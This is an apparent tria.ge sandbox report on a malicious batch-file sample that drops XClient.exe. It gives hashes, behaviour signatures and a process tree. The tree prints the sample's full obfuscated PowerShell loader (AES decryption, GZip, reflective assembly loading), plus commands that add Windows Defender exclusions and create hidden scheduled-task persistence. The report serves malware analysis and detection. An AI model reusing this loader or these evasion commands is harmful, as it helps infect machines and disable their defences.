Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
29/05/2024, 13:50
Static task
static1
Behavioral task
behavioral1
Sample
44baa120c32e2bbe83d9c1b1f8b2cc269e1e18c53efd08a648bf068ccef3153e.bat
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
44baa120c32e2bbe83d9c1b1f8b2cc269e1e18c53efd08a648bf068ccef3153e.bat
Resource
win10v2004-20240426-en
General
-
Target
44baa120c32e2bbe83d9c1b1f8b2cc269e1e18c53efd08a648bf068ccef3153e.bat
-
Size
330KB
-
MD5
54c448c9e570016b04f3f297447b3504
-
SHA1
6e0470f78a958153b513301505ff9379a2a625a0
-
SHA256
44baa120c32e2bbe83d9c1b1f8b2cc269e1e18c53efd08a648bf068ccef3153e
-
SHA512
a5bd205f446a3a04fe753a58983c8df7a468c9b90966c07339f1eb8d36b3ced1975660e102b15fc83b65e3794c8ffb6d40ff74f8a94c1ae8e33ffa0b4599fad6
-
SSDEEP
6144:qjP2m4Zg7LMk5EB11YdkawH8vlP+JamAtdQbCEk+ajFbkDUJEc+cEPMPonbK0v/b:qSm6g7LL6L/1HklP+szy+Fbkk5xwMAn7
Malware Config
Signatures
-
Blocklisted process makes network request 7 IoCs
flow pid Process 13 1988 powershell.exe 22 1988 powershell.exe 37 1988 powershell.exe 40 1988 powershell.exe 48 1988 powershell.exe 49 1988 powershell.exe 51 1988 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5036 powershell.exe 1728 powershell.exe 5008 powershell.exe 1800 powershell.exe 2456 powershell.exe 4440 powershell.exe 1988 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 3040 XClient.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\ProgramData\\XClient.exe" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 764 schtasks.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 2456 powershell.exe 2456 powershell.exe 4440 powershell.exe 4440 powershell.exe 1988 powershell.exe 1988 powershell.exe 5036 powershell.exe 5036 powershell.exe 1728 powershell.exe 1728 powershell.exe 5008 powershell.exe 5008 powershell.exe 1800 powershell.exe 1800 powershell.exe 1988 powershell.exe 3040 XClient.exe 3040 XClient.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2456 powershell.exe Token: SeDebugPrivilege 4440 powershell.exe Token: SeIncreaseQuotaPrivilege 4440 powershell.exe Token: SeSecurityPrivilege 4440 powershell.exe Token: SeTakeOwnershipPrivilege 4440 powershell.exe Token: SeLoadDriverPrivilege 4440 powershell.exe Token: SeSystemProfilePrivilege 4440 powershell.exe Token: SeSystemtimePrivilege 4440 powershell.exe Token: SeProfSingleProcessPrivilege 4440 powershell.exe Token: SeIncBasePriorityPrivilege 4440 powershell.exe Token: SeCreatePagefilePrivilege 4440 powershell.exe Token: SeBackupPrivilege 4440 powershell.exe Token: SeRestorePrivilege 4440 powershell.exe Token: SeShutdownPrivilege 4440 powershell.exe Token: SeDebugPrivilege 4440 powershell.exe Token: SeSystemEnvironmentPrivilege 4440 powershell.exe Token: SeRemoteShutdownPrivilege 4440 powershell.exe Token: SeUndockPrivilege 4440 powershell.exe Token: SeManageVolumePrivilege 4440 powershell.exe Token: 33 4440 powershell.exe Token: 34 4440 powershell.exe Token: 35 4440 powershell.exe Token: 36 4440 powershell.exe Token: SeIncreaseQuotaPrivilege 4440 powershell.exe Token: SeSecurityPrivilege 4440 powershell.exe Token: SeTakeOwnershipPrivilege 4440 powershell.exe Token: SeLoadDriverPrivilege 4440 powershell.exe Token: SeSystemProfilePrivilege 4440 powershell.exe Token: SeSystemtimePrivilege 4440 powershell.exe Token: SeProfSingleProcessPrivilege 4440 powershell.exe Token: SeIncBasePriorityPrivilege 4440 powershell.exe Token: SeCreatePagefilePrivilege 4440 powershell.exe Token: SeBackupPrivilege 4440 powershell.exe Token: SeRestorePrivilege 4440 powershell.exe Token: SeShutdownPrivilege 4440 powershell.exe Token: SeDebugPrivilege 4440 powershell.exe Token: SeSystemEnvironmentPrivilege 4440 powershell.exe Token: SeRemoteShutdownPrivilege 4440 powershell.exe Token: SeUndockPrivilege 4440 powershell.exe Token: SeManageVolumePrivilege 4440 powershell.exe Token: 33 4440 powershell.exe Token: 34 4440 powershell.exe Token: 35 4440 powershell.exe Token: 36 4440 powershell.exe Token: SeIncreaseQuotaPrivilege 4440 powershell.exe Token: SeSecurityPrivilege 4440 powershell.exe Token: SeTakeOwnershipPrivilege 4440 powershell.exe Token: SeLoadDriverPrivilege 4440 powershell.exe Token: SeSystemProfilePrivilege 4440 powershell.exe Token: SeSystemtimePrivilege 4440 powershell.exe Token: SeProfSingleProcessPrivilege 4440 powershell.exe Token: SeIncBasePriorityPrivilege 4440 powershell.exe Token: SeCreatePagefilePrivilege 4440 powershell.exe Token: SeBackupPrivilege 4440 powershell.exe Token: SeRestorePrivilege 4440 powershell.exe Token: SeShutdownPrivilege 4440 powershell.exe Token: SeDebugPrivilege 4440 powershell.exe Token: SeSystemEnvironmentPrivilege 4440 powershell.exe Token: SeRemoteShutdownPrivilege 4440 powershell.exe Token: SeUndockPrivilege 4440 powershell.exe Token: SeManageVolumePrivilege 4440 powershell.exe Token: 33 4440 powershell.exe Token: 34 4440 powershell.exe Token: 35 4440 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1988 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2912 wrote to memory of 2456 2912 cmd.exe 86 PID 2912 wrote to memory of 2456 2912 cmd.exe 86 PID 2456 wrote to memory of 4440 2456 powershell.exe 88 PID 2456 wrote to memory of 4440 2456 powershell.exe 88 PID 2456 wrote to memory of 4776 2456 powershell.exe 90 PID 2456 wrote to memory of 4776 2456 powershell.exe 90 PID 4776 wrote to memory of 364 4776 WScript.exe 91 PID 4776 wrote to memory of 364 4776 WScript.exe 91 PID 364 wrote to memory of 1988 364 cmd.exe 93 PID 364 wrote to memory of 1988 364 cmd.exe 93 PID 1988 wrote to memory of 5036 1988 powershell.exe 94 PID 1988 wrote to memory of 5036 1988 powershell.exe 94 PID 1988 wrote to memory of 1728 1988 powershell.exe 96 PID 1988 wrote to memory of 1728 1988 powershell.exe 96 PID 1988 wrote to memory of 5008 1988 powershell.exe 98 PID 1988 wrote to memory of 5008 1988 powershell.exe 98 PID 1988 wrote to memory of 1800 1988 powershell.exe 100 PID 1988 wrote to memory of 1800 1988 powershell.exe 100 PID 1988 wrote to memory of 764 1988 powershell.exe 104 PID 1988 wrote to memory of 764 1988 powershell.exe 104 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\44baa120c32e2bbe83d9c1b1f8b2cc269e1e18c53efd08a648bf068ccef3153e.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('as5c4IKZBGAmU1MTJQmpbySOtylqsc8fmQAXEiLJEX4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ikgpE1TVZfyQiJXiGT8UmQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zwmaY=New-Object System.IO.MemoryStream(,$param_var); $AOOts=New-Object System.IO.MemoryStream; $lNIen=New-Object System.IO.Compression.GZipStream($zwmaY, [IO.Compression.CompressionMode]::Decompress); $lNIen.CopyTo($AOOts); $lNIen.Dispose(); $zwmaY.Dispose(); $AOOts.Dispose(); $AOOts.ToArray();}function execute_function($param_var,$param2_var){ $XobNX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bHvvl=$XobNX.EntryPoint; $bHvvl.Invoke($null, $param2_var);}$pPSNx = 'C:\Users\Admin\AppData\Local\Temp\44baa120c32e2bbe83d9c1b1f8b2cc269e1e18c53efd08a648bf068ccef3153e.bat';$host.UI.RawUI.WindowTitle = $pPSNx;$MNJUA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($pPSNx).Split([Environment]::NewLine);foreach ($NMxlJ in $MNJUA) { if ($NMxlJ.StartsWith(':: ')) { $QHzcy=$NMxlJ.Substring(3); break; }}$payloads_var=[string[]]$QHzcy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_756_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_756.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4440
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_756.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_756.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:364 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('as5c4IKZBGAmU1MTJQmpbySOtylqsc8fmQAXEiLJEX4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ikgpE1TVZfyQiJXiGT8UmQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zwmaY=New-Object System.IO.MemoryStream(,$param_var); $AOOts=New-Object System.IO.MemoryStream; $lNIen=New-Object System.IO.Compression.GZipStream($zwmaY, [IO.Compression.CompressionMode]::Decompress); $lNIen.CopyTo($AOOts); $lNIen.Dispose(); $zwmaY.Dispose(); $AOOts.Dispose(); $AOOts.ToArray();}function execute_function($param_var,$param2_var){ $XobNX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bHvvl=$XobNX.EntryPoint; $bHvvl.Invoke($null, $param2_var);}$pPSNx = 'C:\Users\Admin\AppData\Roaming\startup_str_756.bat';$host.UI.RawUI.WindowTitle = $pPSNx;$MNJUA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($pPSNx).Split([Environment]::NewLine);foreach ($NMxlJ in $MNJUA) { if ($NMxlJ.StartsWith(':: ')) { $QHzcy=$NMxlJ.Substring(3); break; }}$payloads_var=[string[]]$QHzcy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1800
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\ProgramData\XClient.exe"6⤵
- Creates scheduled task(s)
PID:764
-
-
-
-
-
-
C:\ProgramData\XClient.exeC:\ProgramData\XClient.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3040
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD5dbbf71e9fb59f80938f09809b160e441
SHA18b9a517d846cb9a0a284f77ed88328236a85055f
SHA256e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1
SHA51290b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840
-
Filesize
944B
MD5e243a38635ff9a06c87c2a61a2200656
SHA1ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc
SHA256af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f
SHA5124418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4
-
Filesize
944B
MD5cae60f0ddddac635da71bba775a2c5b4
SHA1386f1a036af61345a7d303d45f5230e2df817477
SHA256b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16
SHA51228ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253
-
Filesize
944B
MD5cd8d372dd2a4d7d1113c591bb656df61
SHA1c84d46708e5c7108627f178e380350c87637b526
SHA2563704870b29b4e2f371ab92340f3a3aa1b2b46d98088b0a5cca40ea5741c2a683
SHA512666a11b8fd202d426cbdee0539278996f3ba82e56faf30327a4d0917b3ee8b59f26ac7afa6b8aaf2decc24594edcc6362f815cd822b38764ecb37d08dac76ba0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
330KB
MD554c448c9e570016b04f3f297447b3504
SHA16e0470f78a958153b513301505ff9379a2a625a0
SHA25644baa120c32e2bbe83d9c1b1f8b2cc269e1e18c53efd08a648bf068ccef3153e
SHA512a5bd205f446a3a04fe753a58983c8df7a468c9b90966c07339f1eb8d36b3ced1975660e102b15fc83b65e3794c8ffb6d40ff74f8a94c1ae8e33ffa0b4599fad6
-
Filesize
115B
MD5741332b211e1f5b2f2830c412d7dfbdd
SHA1b87b9a8e21be3c7d4266d1837b09e6ef38e0446a
SHA2568f35d6dccae662866d028fd45ca5c22bac330fc91ca3f3d2a421d1fccbe17851
SHA512a4fac6b4315a165e0b1827ee8f984aaa2e3b82ce348830fafd996be2eaab303c7ecc8c3a635cea040429638e4c56935243a07330c7e794dcdcac78dcf05b35ee